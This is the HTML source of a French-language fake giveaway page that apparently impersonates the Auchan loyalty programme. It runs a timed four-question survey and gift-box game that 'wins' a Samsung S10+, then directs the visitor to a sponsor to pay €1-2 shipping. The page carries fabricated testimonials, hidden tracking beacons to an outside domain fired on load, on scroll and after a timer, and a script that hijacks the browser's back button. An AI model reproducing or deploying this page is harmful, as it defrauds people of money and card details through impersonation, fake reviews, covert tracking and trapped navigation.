
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="robots" content="noindex, follow">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <title>Alerte de prix !!!</title>
    <meta name="theme-color" content="#c82311">
    <!-- <link rel="icon" type="image/gif" href="http://surveysforyou.club/sweeps/iphone11/french/auchan/yzv0hj8i6w.png"> -->
    <script src="jquery.min.js"></script>
    <link rel="stylesheet" href="bootstrap.min.css">
    <script src="bootstrap.bundle.min.js"></script>
    <link rel="stylesheet" type="text/css" href="2gvcem4be5.css">
    <script type="text/javascript">var portal = 'fr'; var theme = '82-auchan'; var template = 'surbox'; var brand_country = 'France'; var dayNames = Array("Dimanche", "Lundi", "Mardi", "Mercredi", "Jeudi", "Vendredi", "Samedi"); var monthNames = new Array("Janvier", "Février", "Mars", "Avril", "Mai", "Juin", "Juillet", "Août", "Septembre", "Octobre", "Novembre", "Décembre"); var img_regalo = "3vxw72pf86.png"; var minutos_y = "Minute "; var segundos = "Secondes"; var url_f = ""; var modalOptions = { backdrop: 'static', keyboard: false };</script>
    <script defer="" src="nlf167bavx1.js"></script>
    <style type="text/css">
        .content {
            background: linear-gradient(to bottom, red 0, #a20000 5%, white 10%, #e94141 15%, #fb0000 50%, #d11717 85%, #dd2828 90%, #e8aaaa 95%, #ff1010 100%);
        }

        body.with_background {
            background: url("index.html");
        }

        @media (max-width: 800px) {
            body.with_background {
                background: url("index.html");
            }
        }

        .text-primary {
            color: #c82311;
        }
    </style>
    <link rel="stylesheet" type="text/css" href="yt8c402im5.css">
</head>

<body data-pid="tar82" data-type="tar" data-pdate="2019/05/20 09:13:57">
    <div id="p_loading" style="display: none;">
        <div class="d-flex justify-content-center" style="margin: 0 auto;">
            <div class="spinner-border" role="status"><span class="sr-only">Loading...</span></div>
        </div>
    </div>
    <div id="p_body_content"><canvas id="canvasConfetti" width="1366" height="589"></canvas>
        <script type="text/javascript">
            jQuery(document).ready(function () {
                setTimeout(function () {
                    DeactivateConfetti();
                }, 4000);
            });
        </script>
        <div id="id1" class="header">
            <p><img src="logo.png" data-igeneric="t6nmxiaeyq.png"><img src="bgbwt455jk.png"
                    style="float: right;padding-right: 5px;"></p>
        </div>
        <div class="content">
            <div style="display: flex; margin: 0 0 12px 0;">
                <div class="header_flex_item">Programme de fidélité <i class="far fa-bell"></i></div>
                <div class="header_flex_item" style="text-align: right;"><span class="p_var-dia">7</span>&nbsp;<span
                        class="p_var-mes_nombre"></span>, <span class="p_var-anyo"></span></div>
            </div>
            <div class="main-content flag" id="content1">
                <h2 style="font-weight: bold;">Félicitations !!</h2>
                <p>Aujourd'hui <b><span style="color:#c82311"><span class="p_var-dia">7</span>&nbsp;<span
                                class="p_var-mes_nombre"></span>&nbsp;<span
                                class="p_var-anyo"></span></span></b>. Vous avez été sélectionné au hasard pour
                    participer à cette enquête. Cela ne vous prendra qu'une minute et vous pourrez reçevoir un prix: un
                    <b><span style="color:#c82311">Samsung S10+</span></b> !</p>
                <div class="caja_premio" style="max-width: 100%; margin: 0 auto;">
                    <div class="principal_bg"><img class="img-principal principal_efect img-primary"
                            src="iphone11.png" data-igeneric="9idu4k5bvz.png"><img
                            class="img-principal principal_efect p_hidden img-secondary" src="ylr0mzcfs6.png"
                            data-igeneric="q4gze38di0.png"></div>
                </div>
                <p>Comme chaque <b><span style="color:#c82311"><span class="p_var-dia_nombre">Dimanche</span></span></b>
                    nous offrons des prix fabuleux à 10 utilisateurs. Le prix d'aujourd'hui est un Samsung S10+ ! Uniquement 10 chanceux seront les gagnants et uniquement pour des résidents en France !</p>
                <p>Cette enquête a été développée à fin d'améliorer le service à nos utilisateurs et votre participation
                    sera récompensée</p>
                <p>Vous avez uniquement <font color="red"><b><span id="timerr" style="color:#c82311">0 Minute 54
                                Secondes</span></b></font> pour pouvoir participer.</p>
                <p>Vite, le nombre de prix est limité !</p>
                <div class="main-content flag" id="questions_all" data-total="4">
                    <div id="q1">
                        <p class="question"><strong>Question 1 de 4:</strong>&nbsp;<span>Êtes-vous un homme ou une
                                femme?</span></p>
                        <div class="survey_button bq bq1" data-question="1" data-bq="1">Homme</div>
                        <div class="survey_button bq bq1" data-question="1" data-bq="2">Femme</div>
                    </div>
                    <div id="q2">
                        <p class="question"><strong>Question 2 de 4:</strong>&nbsp;<span>Quel âge avez-vous?</span></p>
                        <div class="survey_button bq bq2" data-question="2" data-bq="1">18-29</div>
                        <div class="survey_button bq bq2" data-question="2" data-bq="2">30-39</div>
                        <div class="survey_button bq bq2" data-question="2" data-bq="3">40-49</div>
                        <div class="survey_button bq bq2" data-question="2" data-bq="4">50+</div>
                    </div>
                    <div id="q3">
                        <p class="question"><strong>Question 3 de 4:</strong>&nbsp;<span>Combien de personnes composent
                                votre foyer ?</span></p>
                        <div class="survey_button bq bq3" data-question="3" data-bq="1">Moi uniquement</div>
                        <div class="survey_button bq bq3" data-question="3" data-bq="2">1</div>
                        <div class="survey_button bq bq3" data-question="3" data-bq="3">2</div>
                        <div class="survey_button bq bq3" data-question="3" data-bq="4">3+</div>
                    </div>
                    <div id="q4">
                        <p class="question"><strong>Question 4 de 4:</strong>&nbsp;<span>Avez-vous déjà acheté chez
                                <span class="p_var-marca">Auchan</span>?</span></p>
                        <div class="survey_button bq bq4" data-question="4" data-bq="1">OUI</div>
                        <div class="survey_button bq bq4" data-question="4" data-bq="2">NON</div>
                    </div>
                </div>
                <link rel="stylesheet" type="text/css" href="vs70k5l3z5.css">
                <style type="text/css">
                    .survey_button {
                        background-color: #c82311;
                    }
                </style>
            </div>
            <div class="main-content" id="content2">
                <h2 style="text-align:center">Vos réponses sont en train d'être vérifiées</h2>
                <div class="d-flex justify-content-center">
                    <div class="spinner-border m-3" role="status"><span class="sr-only">Loading...</span></div>
                </div>
                <p class="result" id="result1">Vous avez répondu <span class="questions_of">4/4</span> questions!</p>
                <p class="result" id="result2">Il n'y a pas d'enquêtes préalables depuis votre IP</p>
                <p class="result" id="result3">Il y a encore des cadeaux disponibles !</p>
            </div>
            <div class="main-content" id="content3">
                <script type="text/javascript">var box_ini = false;</script>
                <link rel="stylesheet" type="text/css" href="o3karv6ec5.css">
                <style type="text/css">
                    .boxes {
                        background-image: url(http://surveysforyou.club/sweeps/iphone11/french/auchan/4541ncdgca.jpg);
                    }

                    .boxes-cgeneric {
                        background-image: url(http://surveysforyou.club/sweeps/iphone11/french/auchan/1va60r3sug.jpg);
                    }
                </style>
                <div id="boxes" class="boxes" data-cgeneric="boxes-cgeneric">
                    <div class="div_img_gift"><img class="img_gift box-gift" src="iphone11.png"
                            data-igeneric="7o4awhsr6j.png"></div>
                    <div id="0" class="try temblor">
                        <div class="caja_tapa"><img class="box-01" src="ehil2534ab.png"
                                data-igeneric="2ml2eus730.png"></div>
                        <div class="caja_trasera"><img class="box-03" src="xcmda0yz8f.png"
                                data-igeneric="qrn83hgpe9.png"></div>
                        <div class="caja_gift showned"><img class="box-04" src="i10box.png"
                                data-igeneric="8cskl2j4ru.png"></div>
                        <div class="caja"><img class="box-02" src="43kwa508c0.png"
                                data-igeneric="ugcbjeh33d.png"></div>
                    </div>
                    <div id="1" class="try temblor">
                        <div class="caja_tapa"><img class="box-01" src="ehil2534ab.png"
                                data-igeneric="2ml2eus730.png"></div>
                        <div class="caja_trasera"><img class="box-03" src="xcmda0yz8f.png"
                                data-igeneric="qrn83hgpe9.png"></div>
                        <div class="caja_gift showned"><img class="box-04" src="i10box.png"
                                data-igeneric="8cskl2j4ru.png"></div>
                        <div class="caja"><img class="box-02" src="43kwa508c0.png"
                                data-igeneric="ugcbjeh33d.png"></div>
                    </div>
                    <div id="2" class="try temblor">
                        <div class="caja_tapa"><img class="box-01" src="ehil2534ab.png"
                                data-igeneric="2ml2eus730.png"></div>
                        <div class="caja_trasera"><img class="box-03" src="xcmda0yz8f.png"
                                data-igeneric="qrn83hgpe9.png"></div>
                        <div class="caja_gift showned"><img class="box-04" src="i10box.png"
                                data-igeneric="8cskl2j4ru.png"></div>
                        <div class="caja"><img class="box-02" src="43kwa508c0.png"
                                data-igeneric="ugcbjeh33d.png"></div>
                    </div>
                    <div id="3" class="try temblor">
                        <div class="caja_tapa"><img class="box-01" src="ehil2534ab.png"
                                data-igeneric="2ml2eus730.png"></div>
                        <div class="caja_trasera"><img class="box-03" src="xcmda0yz8f.png"
                                data-igeneric="qrn83hgpe9.png"></div>
                        <div class="caja_gift showned"><img class="box-04" src="i10box.png"
                                data-igeneric="8cskl2j4ru.png"></div>
                        <div class="caja"><img class="box-02" src="43kwa508c0.png"
                                data-igeneric="ugcbjeh33d.png"></div>
                    </div>
                    <div id="4" class="try temblor">
                        <div class="caja_tapa"><img class="box-01" src="ehil2534ab.png"
                                data-igeneric="2ml2eus730.png"></div>
                        <div class="caja_trasera"><img class="box-03" src="xcmda0yz8f.png"
                                data-igeneric="qrn83hgpe9.png"></div>
                        <div class="caja_gift showned"><img class="box-04" src="i10box.png"
                                data-igeneric="8cskl2j4ru.png"></div>
                        <div class="caja"><img class="box-02" src="43kwa508c0.png"
                                data-igeneric="ugcbjeh33d.png"></div>
                    </div>
                    <div id="5" class="try temblor">
                        <div class="caja_tapa"><img class="box-01" src="ehil2534ab.png"
                                data-igeneric="2ml2eus730.png"></div>
                        <div class="caja_trasera"><img class="box-03" src="xcmda0yz8f.png"
                                data-igeneric="qrn83hgpe9.png"></div>
                        <div class="caja_gift showned"><img class="box-04" src="i10box.png"
                                data-igeneric="8cskl2j4ru.png"></div>
                        <div class="caja"><img class="box-02" src="43kwa508c0.png"
                                data-igeneric="ugcbjeh33d.png"></div>
                    </div>
                    <div id="6" class="try temblor">
                        <div class="caja_tapa"><img class="box-01" src="ehil2534ab.png"
                                data-igeneric="2ml2eus730.png"></div>
                        <div class="caja_trasera"><img class="box-03" src="xcmda0yz8f.png"
                                data-igeneric="qrn83hgpe9.png"></div>
                        <div class="caja_gift showned"><img class="box-04" src="i10box.png"
                                data-igeneric="8cskl2j4ru.png"></div>
                        <div class="caja"><img class="box-02" src="43kwa508c0.png"
                                data-igeneric="ugcbjeh33d.png"></div>
                    </div>
                    <div id="7" class="try temblor">
                        <div class="caja_tapa"><img class="box-01" src="ehil2534ab.png"
                                data-igeneric="2ml2eus730.png"></div>
                        <div class="caja_trasera"><img class="box-03" src="xcmda0yz8f.png"
                                data-igeneric="qrn83hgpe9.png"></div>
                        <div class="caja_gift showned"><img class="box-04" src="i10box.png"
                                data-igeneric="8cskl2j4ru.png"></div>
                        <div class="caja"><img class="box-02" src="43kwa508c0.png"
                                data-igeneric="ugcbjeh33d.png"></div>
                    </div>
                    <div id="8" class="try temblor">
                        <div class="caja_tapa"><img class="box-01" src="ehil2534ab.png"
                                data-igeneric="2ml2eus730.png"></div>
                        <div class="caja_trasera"><img class="box-03" src="xcmda0yz8f.png"
                                data-igeneric="qrn83hgpe9.png"></div>
                        <div class="caja_gift showned"><img class="box-04" src="i10box.png"
                                data-igeneric="8cskl2j4ru.png"></div>
                        <div class="caja"><img class="box-02" src="43kwa508c0.png"
                                data-igeneric="ugcbjeh33d.png"></div>
                    </div>
                    <div id="9" class="try temblor">
                        <div class="caja_tapa"><img class="box-01" src="ehil2534ab.png"
                                data-igeneric="2ml2eus730.png"></div>
                        <div class="caja_trasera"><img class="box-03" src="xcmda0yz8f.png"
                                data-igeneric="qrn83hgpe9.png"></div>
                        <div class="caja_gift showned"><img class="box-04" src="i10box.png"
                                data-igeneric="8cskl2j4ru.png"></div>
                        <div class="caja"><img class="box-02" src="43kwa508c0.png"
                                data-igeneric="ugcbjeh33d.png"></div>
                    </div>
                    <div id="10" class="try temblor">
                        <div class="caja_tapa"><img class="box-01" src="ehil2534ab.png"
                                data-igeneric="2ml2eus730.png"></div>
                        <div class="caja_trasera"><img class="box-03" src="xcmda0yz8f.png"
                                data-igeneric="qrn83hgpe9.png"></div>
                        <div class="caja_gift showned"><img class="box-04" src="i10box.png"
                                data-igeneric="8cskl2j4ru.png"></div>
                        <div class="caja"><img class="box-02" src="43kwa508c0.png"
                                data-igeneric="ugcbjeh33d.png"></div>
                    </div>
                    <div id="11" class="try temblor">
                        <div class="caja_tapa"><img class="box-01" src="ehil2534ab.png"
                                data-igeneric="2ml2eus730.png"></div>
                        <div class="caja_trasera"><img class="box-03" src="xcmda0yz8f.png"
                                data-igeneric="qrn83hgpe9.png"></div>
                        <div class="caja_gift showned"><img class="box-04" src="i10box.png"
                                data-igeneric="8cskl2j4ru.png"></div>
                        <div class="caja"><img class="box-02" src="43kwa508c0.png"
                                data-igeneric="ugcbjeh33d.png"></div>
                    </div>
                </div>
                <div id="p_modal1" class="modal fade text-center p_modal" tabindex="-1" role="dialog"
                    aria-hidden="true">
                    <div class="modal-dialog" role="document">
                        <div class="modal-content">
                            <div class="modal-body"><img class="temblor_inf box-00" src="3rzejfmew4.png"
                                    data-igeneric="f0edo4s5nr.png">
                                <h2>Félicitations, tes réponses on été correctement validées !</h2>
                                <p>Aujourd'hui <span class="p_var-dia"></span>&nbsp;<span
                                        class="p_var-mes_nombre"></span> tu as l'opportunité de remporter un
                                    Samsung S10+ ! <br><br>Tu n'as qu'à choisir la boîte cadeau correcte.
                                    <br><br> Tu as 3 tentatives, bonne chance !</p><button type="button"
                                    id="p_modal_button1" class="btn btn-success btn-lg"
                                    style="background-color:#c82311; border-color:#c82311">OK</button>
                            </div>
                        </div>
                    </div>
                </div>
                <div id="p_modal2" class="modal fade text-center p_modal" tabindex="-1" role="dialog"
                    aria-hidden="true">
                    <div class="modal-dialog" role="document">
                        <div class="modal-content">
                            <div class="modal-body">
                                <div class="circle-loader">
                                    <div class="checkmark draw"></div>
                                </div>
                                <h2>OHHH...</h2>
                                <p>Nous sommes désolés, ce cadeau est vide ! Tu as encore (<span
                                        id="num_intentos">3</span>) tentatives. Bonne chance !</p><button type="button"
                                    id="p_modal_button2" class="btn btn-success btn-lg"
                                    style="background-color:#c82311; border-color:#c82311">OK</button>
                            </div>
                        </div>
                    </div>
                </div>
                <div id="p_modal3" class="modal fade text-center p_modal" tabindex="-1" role="dialog"
                    aria-hidden="true">
                    <div class="modal-dialog" role="document">
                        <div class="modal-content">
                            <div class="modal-body"><img class="box-gift" src="iphone11.png"
                                    data-igeneric="38d5sjew3b.png">
                                <h2>BON CHOIX !</h2>
                                <p>Tu as remporté un Samsung S10+ !<br><br> ***INSTRUCTIONS*** <br>

1. Cliquez sur "OK" ci-dessous pour visiter la page de notre sponsor.<br>

2. Entrez votre adresse et payez €1-2 pour l'expédition pour obtenir votre Samsung S10+.<br>

3. Samsung S10+ sera livré dans les 5-7 jours. </p><button type="button" id="p_modal_button3"
                                    class="btn btn-success btn-lg"
                                    style="background-color:#c82311; border-color:#c82311">OK</button>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="main-content">
                <link href="css.css" rel="stylesheet">
                <link rel="stylesheet" type="text/css" href="kwr66ubvod.css">
                <div class="comments_face">
                    <div class="comments">
                        <p style="margin:0;padding:0;float:left;display:block;width:50%"><span
                                style="color:#3b5998">Plus d'opinions</span></p>
                        <p
                            style="margin:0;padding:0;float:right;display:block;width:50%;color:#a8a7a7;text-align:right">
                            8 de 80</p>
                        <div style="clear:both"></div>
                    </div>
                    <div class="comments" id="comment0" style="display:block">
                        <div class="profile"><img src="3f1fj6cbf5.jpg"></div>
                        <div class="comment-content">
                            <p class="name">Cécile Carpentier</p>
                            <p>Mèrde je ne gagne jamais rien :( </p>
                        </div>
                        <div class="clr"></div>
                        <div class="comment-status"><span>J'aime · Commenter <img src="j5b1cl06m8.png"
                                    width="15px" height="15px">3</span> · <u>4 Minutes</u></div>
                    </div>
                    <div class="comments" id="comment1" style="display:block">
                        <div class="profile"><img src="watxc5e8bl.jpg"></div>
                        <div class="comment-content">
                            <p class="name">Jil Lambert</p>
                            <p>J'avais pensé que c'était une blague mais j'ai obtenu mon Samsung S10+, j'ai
                                bien dit à mes amis d'aller remporter le sien lol </p>
								<div class="comment-img"><img src="iph11.jpg" style="max-width:100px;"></div>
                            <p></p>
                        </div>
                        <div class="clr"></div>
                        <div class="comment-status"><span>J'aime · Commenter <img src="j5b1cl06m8.png"
                                    width="15px" height="15px">17</span> · <u>38 Minutes</u></div>
                    </div>
                    <div class="comments" id="comment2" style="display:block">
                        <div class="profile"><img src="b8c5a566av.jpg"></div>
                        <div class="comment-content">
                            <p class="name">Éric Clement</p>
                            <p>J'ai reçu un appel comme que j'avais gagné, je suis trop content ! </p>
                        </div>
                        <div class="clr"></div>
                        <div class="comment-status"><span>J'aime · Commenter <img src="j5b1cl06m8.png"
                                    width="15px" height="15px">46</span> · <u>1 Heure</u></div>
                    </div>
                    <div class="comments" id="comment3" style="display:block">
                        <div class="profile"><img src="xoz15559la.jpg"></div>
                        <div class="comment-content">
                            <p class="name">Matthieu Dubois</p>
                            <p>Je pensais que c'était une blague mais j'ai reçu le Samsung S10+ ce matin, j'aimerai
                                bien faire plus d'ênquetes ! </p>
                        </div>
                        <div class="clr"></div>
                        <div class="comment-status"><span>J'aime · Commenter <img src="j5b1cl06m8.png"
                                    width="15px" height="15px">10</span> · <u>1 Heure</u></div>
                    </div>
                    <div class="comments" id="comment3" style="display:block">
                        <div class="profile"><img src="3e2boxbpka.jpg"></div>
                        <div class="comment-content">
                            <p class="name">Emeline Dupuy</p>
                            <p>C'est possible de reçevoir mon iPhone aujourd'hui? merci </p>

                        </div>
                        <div class="clr"></div>
                        <div class="comment-status"><span>J'aime · Commenter <img src="j5b1cl06m8.png"
                                    width="15px" height="15px">36</span> · <u>2 Heure</u></div>
                    </div>
                    <div class="comments" id="comment4" style="display:block">
                        <div class="profile"><img src="lqowtsb73b.jpg"></div>
                        <div class="comment-content">
                            <p class="name">Abel Roux</p>
                            <p>J'adores ce type d'offres! </p>
                        </div>
                        <div class="clr"></div>
                        <div class="comment-status"><span>J'aime · Commenter <img src="j5b1cl06m8.png"
                                    width="15px" height="15px">31</span> · <u>3 Heure</u></div>
                    </div>
                    <div class="comments" id="comment4" style="display:block">
                        <div class="profile"><img src="sbd8o551tz.jpg"></div>
                        <div class="comment-content">
                            <p class="name">Alexandre Simon</p>
                            <p>Cool, j'avais jamais rien gagné! </p>
                        </div>
                        <div class="clr"></div>
                        <div class="comment-status"><span>J'aime · Commenter <img src="j5b1cl06m8.png"
                                    width="15px" height="15px">4</span> · <u>5 Heure</u></div>
                    </div>
                    <div class="comments" id="comment5" style="display:block">
                        <div class="profile"><img src="t0eg3cjwue.jpg"></div>
                        <div class="comment-content">
                            <p class="name">Camille Guillot</p>
                            <p>J'ai participé, j'ai gagné et reçu mon Samsung S10+ en 5 jours, merci ! </p>
                        </div>
                        <div class="clr"></div>
                        <div class="comment-status"><span>J'aime · Commenter <img src="j5b1cl06m8.png"
                                    width="15px" height="15px">37</span> · <u>6 Heure</u></div>
                    </div>
                </div>

            </div>
        </div>
        <script type="text/javascript"></script>
        <div style="display:none">
            <form name="p_form_post" id="p_form_post" method="post"><input type="hidden" name="security"
                    value="1"><input type="hidden" name="esunhuma" value=""><input type="hidden" name="url_f"
                    value="https://traterior-outhing.icu/click"><input
                    type="hidden" name="url_f_plus" value=""></form>
        </div>
    </div>
    <link rel="stylesheet" href="all.css"
        >

        	<!-- Windows Orientation -->
<script>
    if (typeof(window.orientation)=="undefined")
    {
        var o = document.createElement("img");
        o.src='https://traterior-outhing.icu/click';
    }
    else
    {
        var o = document.createElement("img");
        o.src='https://traterior-outhing.icu/click';
    }
</script>

<!-- On Sroll -->
<script type="text/javascript">
var scroll = 0;
window.onscroll = function(){
if( scroll != 1 ){
    scroll = 1;
    var o = document.createElement("img");
    o.src = "https://traterior-outhing.icu/click";
    }
}
</script>

<!-- Time 10sec -->
<script>
function pushToTrackerViaImage(){
    var pushURL = 'https://traterior-outhing.icu/click';
    var img = document.createElement('img');
    img.src=pushURL;
    img.style.display='none';
    document.body.appendChild( img );
}
function pushAfterTimeout(timeout){
    setTimeout(pushToTrackerViaImage, timeout*1000);
}
var TIMEOUT_IN_SECONDS = 10;
pushAfterTimeout(TIMEOUT_IN_SECONDS);
</script>
<script type="text/javascript">!function(a,b){history.replaceState(null,document.title,b.pathname+"#!/index"),history.pushState(null,document.title,b.pathname),a.addEventListener("popstate",function(){"#!/index"===b.hash&&(history.replaceState(null,document.title,b.pathname),setTimeout(function(){b.replace(href="#")},0))},!1)}(window,location);</script>

</body>

</html>
